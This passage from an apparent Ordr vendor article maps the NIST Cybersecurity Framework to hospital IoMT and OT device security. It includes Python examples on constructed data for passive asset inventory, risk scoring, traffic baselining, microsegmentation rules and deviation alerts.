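# Constructed DHCP fingerprint records observed passively on the wire:
# (mac, ip, hostname, vendor class). None of these are real devices.
DHCP_RECORDS = [
    ("00:1a:2b:00:00:01", "10.1.1.10", "INFUSION-PUMP-7", "MedPump-OS"),
    ("00:1a:2b:00:00:02", "10.1.1.11", "CT-SCANNER-2", "RadOS 3.1"),
    ("00:1a:2b:00:00:03", "10.1.1.12", "NURSE-WS-14", "MSFT 5.0"),
    ("00:1a:2b:00:00:04", "10.1.1.13", "HVAC-CTRL-B2", "BuildingCtl"),
]

# Constructed flow records from a network tap: (src_ip, dst_ip, dst_port).
# 10.1.1.99 never sent DHCP, so it is discoverable only from its traffic.
FLOWS = [
    ("10.1.1.10", "10.1.5.20", 2575),   # infusion pump -> HL7 interface engine
    ("10.1.1.11", "10.1.5.30", 104),    # CT scanner -> PACS (DICOM)
    ("10.1.1.12", "10.1.5.40", 443),    # nurse workstation -> web application
    ("10.1.1.13", "10.1.5.50", 47808),  # HVAC -> building controller (BACnet)
    ("10.1.1.99", "10.1.5.30", 104),    # unknown device talking DICOM to PACS
]

# Hypothetical vulnerability feed keyed by DHCP vendor class. The IDs are
# placeholders, not real CVE identifiers; the numbers are CVSS-style scores.
VULN_FEED = {
    "MedPump-OS": [("EXAMPLE-VULN-001", 9.8)],
    "RadOS 3.1": [("EXAMPLE-VULN-002", 7.5)],
}

# Hostname prefix -> device class (constructed classification rules).
CATEGORY_RULES = [("INFUSION", "iomt"), ("CT-", "iomt"),
                  ("NURSE-WS", "it"), ("HVAC", "ot")]
# Destination ports whose traffic implies PHI handling (HL7 MLLP, DICOM).
REGULATED_PORTS = {2575: "HL7", 104: "DICOM"}
# Assumed base criticality per class; unknown devices sit between IT and OT.
CATEGORY_WEIGHT = {"iomt": 3.0, "ot": 2.0, "it": 1.0, "unknown": 1.5}


@dataclass
class Asset:
    ip: str
    mac: str = "unknown"
    hostname: str = "unknown"
    vendor_class: str = "unknown"
    category: str = "unknown"
    regulated_protocols: set = field(default_factory=set)
    vulns: list = field(default_factory=list)
    risk: float = 0.0


def classify(hostname):
    """Map a hostname to a device class using the prefix rules."""
    for prefix, category in CATEGORY_RULES:
        if hostname.startswith(prefix):
            return category
    return "unknown"


def score(asset):
    """Assumed formula: class weight + half the worst CVSS + 2 if PHI is handled, capped at 10."""
    worst = max((cvss for _, cvss in asset.vulns), default=0.0)
    phi_bonus = 2.0 if asset.regulated_protocols else 0.0
    return round(min(10.0, CATEGORY_WEIGHT[asset.category] + 0.5 * worst + phi_bonus), 2)


def build_inventory(dhcp_records, flows, feed):
    """Build the inventory passively: DHCP gives identity, flows give behaviour."""
    inventory = {}
    for mac, ip, hostname, vendor_class in dhcp_records:
        inventory[ip] = Asset(ip, mac, hostname, vendor_class, classify(hostname))
    for src, _dst, port in flows:
        asset = inventory.setdefault(src, Asset(src))  # discover devices that never sent DHCP
        if port in REGULATED_PORTS:
            asset.regulated_protocols.add(REGULATED_PORTS[port])
    for asset in inventory.values():
        asset.vulns = feed.get(asset.vendor_class, [])
        asset.risk = score(asset)
    return inventory


def prioritize(inventory):
    """Return (ip, hostname, risk) tuples, highest risk first, for the HTM work queue."""
    return sorted(((a.ip, a.hostname, a.risk) for a in inventory.values()),
                  key=lambda t: t[2], reverse=True)


if __name__ == "__main__":
    for ip, host, risk in prioritize(build_inventory(DHCP_RECORDS, FLOWS, VULN_FEED)):
        print(f"{ip:<12} {host:<18} risk={risk}")
```

The constructed 10.1.1.99 host shows why traffic-based discovery matters: it never sent DHCP, so a lease-only inventory would miss it, yet it is exchanging DICOM with the PACS and therefore sits above the HVAC controller in the work queue. Nothing here touches the devices; the inputs are a DHCP snoop and a tap, which is what "agentless, passive" means in practice.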
3. Detect (DE)
Detect is the section of the NIST Cybersecurity Framework that focuses on the development and implementation of capabilities, tasks, and activities required to identify incidents precipitated by a cybersecurity event. This functionality enables the organization to discover cybersecurity incidents quickly and efficiently.
Consider these tasks:
- Establish a baseline of network operations and expected data patterns for systems and users and ensure it stays maintained.
- Analyze all detected events to understand attack methods and intended targets.
- Aggregate and correlate event data from multiple sensors and sources.
- Determine the impact of events.
- Establish incident alert thresholds.
- Monitor the network to detect any potential cybersecurity events.
- Monitor the physical environment to detect potential cybersecurity incidents.
- Use monitoring to detect unauthorized connections, software, devices, or personnel.
- Perform vulnerability scans.
- Communicate event detection information to all appropriate parties.
Choose a platform that provides the ability to detect malicious activity as well as a security dashboard based on a consolidated view of events, which can be further enhanced with criticality and MITRE kill chain step data. Your organization also can benefit from a platform that can provide real-time alerts filtered by security event types so specific staff can be notified, based on the affected asset. A high-quality solution should be capable of detecting and logging device moves, adds, and changes.
Ordr continuously monitors the network and employs intrusion detection capabilities to identify known malicious attack traffic. In addition, the solution creates a baseline of normal behavior for each connected device and detects abnormal deviations from it. With these capabilities Ordr can identify active threats, attempts to exploit vulnerabilities, and indications of compromise. Your platform should work with security information and event management (SIEM) and IT asset management (ITAM) products so it can seamlessly integrate with existing workflows and procedures.
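The Protect discussion above (baseline communication behavior turned into device-specific microsegmentation policy) and the Detect section (baseline deviations, alert thresholds, escalation) describe one pipeline. The following added example, which is not Ordr's code or any vendor's implementation, walks through it on constructed flow records: learn each device's baseline, emit an allowlist with a default deny, flag live flows outside the baseline, and escalate devices that cross an alert threshold. The rule format is an assumption chosen for readability rather than any firewall or switch syntax, and the addresses (10.x internal, 203.0.113.7 as a documentation-range external host) are constructed.

```python
"""Per-device baseline -> microsegmentation allowlist -> deviation alerts (added example)."""
from collections import defaultdict

# Constructed flows captured during a learning window: (src_ip, dst_ip, dst_port, proto).
LEARNING_FLOWS = [
    ("10.1.1.10", "10.1.5.20", 2575, "tcp"),  # infusion pump -> HL7 interface engine
    ("10.1.1.10", "10.1.5.20", 2575, "tcp"),
    ("10.1.1.10", "10.1.5.53", 53, "udp"),    # pump -> DNS
    ("10.1.1.11", "10.1.5.30", 104, "tcp"),   # CT scanner -> PACS (DICOM)
    ("10.1.1.11", "10.1.5.53", 53, "udp"),    # scanner -> DNS
]

# Constructed flows observed after enforcement started. 203.0.113.7 is a
# documentation address standing in for an unknown external host.
LIVE_FLOWS = [
    ("10.1.1.10", "10.1.5.20", 2575, "tcp"),    # normal
    ("10.1.1.10", "203.0.113.7", 443, "tcp"),   # pump reaching the internet
    ("10.1.1.10", "10.1.1.11", 445, "tcp"),     # pump opening SMB to the CT scanner
    ("10.1.1.11", "10.1.5.30", 104, "tcp"),     # normal
    ("10.1.1.11", "203.0.113.7", 443, "tcp"),   # scanner reaching the internet
]

INTERNAL_PREFIXES = ("10.",)  # assumed internal address space for the example


def learn_baseline(flows):
    """Baseline = the set of (dst, port, proto) each device used during learning."""
    baseline = defaultdict(set)
    for src, dst, port, proto in flows:
        baseline[src].add((dst, port, proto))
    return dict(baseline)


def build_policy(baseline):
    """Turn a baseline into a device-specific allowlist ending in a default deny.

    The rule text is a generic, vendor-neutral format used only for illustration.
    """
    rules = []
    for src in sorted(baseline):
        for dst, port, proto in sorted(baseline[src]):
            rules.append(f"permit {proto} {src} -> {dst}:{port}")
        rules.append(f"deny any {src} -> any")
    return rules


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIXES)


def detect_deviations(baseline, flows):
    """Flag flows outside a device's baseline; external destinations rank higher.

    A device with no baseline at all (never seen in learning) has every flow flagged.
    """
    alerts = []
    for src, dst, port, proto in flows:
        if (dst, port, proto) in baseline.get(src, set()):
            continue
        severity = "high" if not is_internal(dst) else "medium"
        alerts.append({"src": src, "dst": dst, "port": port,
                       "proto": proto, "severity": severity})
    return alerts


def escalate(alerts, threshold=2):
    """Devices whose alert count reaches the threshold go to the quarantine review queue."""
    counts = defaultdict(int)
    for alert in alerts:
        counts[alert["src"]] += 1
    return sorted(src for src, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    base = learn_baseline(LEARNING_FLOWS)
    print("\n".join(build_policy(base)))
    found = detect_deviations(base, LIVE_FLOWS)
    for a in found:
        print(f"[{a['severity']}] {a['src']} -> {a['dst']}:{a['port']}/{a['proto']}")
    print("escalate:", escalate(found))
```

The policy is only as good as the learning window: a baseline captured while a device was idle or mid-incident will be too narrow or too wide, so real deployments validate learned rules with the clinical engineering team before enforcing them. The threshold in escalate() is the "incident alert thresholds" task from the Detect list; with the constructed flows the pump crosses it (one external and one lateral deviation) while the scanner does not.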
4. Respond (RS)
The Respond function of the NIST Cybersecurity Framework revolves around containing the impact of a potential cybersecurity event. It includes development and implementation of necessary activities to take action once a cybersecurity event has been detected.
Such recommended tasks include:
- Develop a response planning process and ensure that it's executed when an incident is detected.
- Contain and mitigate incidents.
- Mitigate newly identified vulnerabilities and/or document them as accepted risks.
- Develop and manage a communication plan for stakeholders, both internal and external, and law enforcement for when incidents occur.
- Determine the impact of incidents by analyzing how effective the response plan is.
- Implement any revisions to the process based on lessons learned from incidents.
Ordr takes pride in being an ideal solution, as our platform uses automation to accelerate your response to an incident with the ability to create and apply next-generation firewall (NGFW) policies, quarantine VLAN assignment, access control list blocks, session termination, and port shutdown with a single click of a button. Ordr also provides details on the physical and network location for each device in the event that a technician needs to physically remove a device from the network or apply a patch by accessing the device directly.
5. Recover (RC)
The ability to recover from an incident needs to be both timely and effective. The quicker system restoration is performed and operations returned to normal, the less impact the cyber incident has on your organization.
The NIST Cybersecurity Framework recommends these steps:
- Execute and maintain recovery procedures and processes to facilitate system restoration.
- Improve recovery processes and planning by incorporating findings and lessons learned into future solutions.
- Coordinate all restoration tasks with both internal and external parties.
Recovery is highly dependent on the circumstances of the attack, the attack method, and the level of complexity in the findings. Ordr's ability to identify the network and physical location of a device can aid in the system restoration process by enabling staff to quickly locate a device impacted by a cyber event that may need to be updated or reimaged. Ordr can also quickly move a quarantined device back to its normal network environment once upgrades, patches, or other remediation methods have been applied.
Use Ordr to Extend the NIST Cybersecurity Framework Throughout Your Organization
The NIST Cybersecurity Framework uses five specific service lanes that should be handled concurrently. The NIST Cybersecurity Framework is highly effective and can be used by any size organization in any industry.
The Identify function determines the who, what, when, and where of the cybersecurity configuration, while the Protect function employs safeguards and protects critical assets. Once you've dealt with the Detect function, which monitors the network and roots out trouble, the Respond function launches the policies and procedures to combat an active attack. Finally, Recover involves the necessary activities to bring the system back to normal.
Ordr helps organizations extend the NIST Cybersecurity Framework to cover all of their assets, including IoT/IoMT/OT devices. With Ordr, you can rapidly inventory all assets in the domain, automatically classify them based on type and function, and assess each device for risk. It analyzes device communications to learn behaviors and creates device baselines to determine what communications the device requires for normal operations. From this baseline, Ordr can detect malicious activity and create policies to quickly stop active threats and quarantine compromised devices without disrupting the device, network, or enterprise operations. Ordr also uses device baselines to proactively improve protection via microsegmentation to logically segregate devices from non-essential areas.
To learn more about how Ordr aligns to the NIST framework, download this report.